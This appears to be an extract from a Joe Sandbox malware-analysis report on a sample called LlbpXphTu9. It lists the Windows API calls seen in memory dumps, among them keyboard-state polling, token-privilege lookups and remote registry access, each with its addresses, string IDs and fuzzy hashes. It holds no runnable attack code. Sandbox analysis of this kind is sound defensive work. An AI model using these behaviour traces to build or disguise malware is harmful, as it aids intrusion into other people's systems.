                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 136442275-0
                                                                                                                                                                            • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                            • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                                                                                            • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                            • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                                                                            • Opcode ID: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
                                                                                                                                                                            • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                                                                                            • Opcode Fuzzy Hash: e91c6bd909ad74ed1928ed0244ed8aa8a8dc52ba60fb0b240039b69f8a910896
                                                                                                                                                                            • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00460502
                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                            • API String ID: 4123061591-1241985126
                                                                                                                                                                            • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                            • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                                                                            • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                              • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                                                                            • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                                                                            • API String ID: 2483343779-2060113733
                                                                                                                                                                            • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                                                                            • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                                                                            • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                                                                            • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                            • String ID: 2
                                                                                                                                                                            • API String ID: 1331449709-450215437
                                                                                                                                                                            • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                            • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                                                                            • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                            • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DestroyWindow
                                                                                                                                                                            • String ID: static
                                                                                                                                                                            • API String ID: 3375834691-2160076837
                                                                                                                                                                            • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                                                                            • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                                                                            • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                                                                            • _memcmp.LIBCMT ref: 004394A9
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                                                                            Strings
                                                                                                                                                                            • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                                                                            • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                                                            • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                                                            • API String ID: 1446985595-805462909
                                                                                                                                                                            • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                            • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                            • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                                                                            • API String ID: 2907320926-41864084
                                                                                                                                                                            • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                            • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                                                                            • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                            • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                                                                            APIs
                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1932665248-0
                                                                                                                                                                            • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                                                                            • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                                                            • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                                                                            • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                                                                            • _memset.LIBCMT ref: 004481BA
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 830647256-0
                                                                                                                                                                            • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                            • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                                                            • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                            • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                                                                            • DeleteObject.GDI32(005C0000), ref: 0046EB4F
                                                                                                                                                                            • DestroyIcon.USER32(00750050), ref: 0046EB67
                                                                                                                                                                            • DeleteObject.GDI32(55B84A6A), ref: 0046EB7F
                                                                                                                                                                            • DestroyWindow.USER32(00430049), ref: 0046EB97
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 802431696-0
                                                                                                                                                                            • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                            • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                            • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                                                            • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                                                                            • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
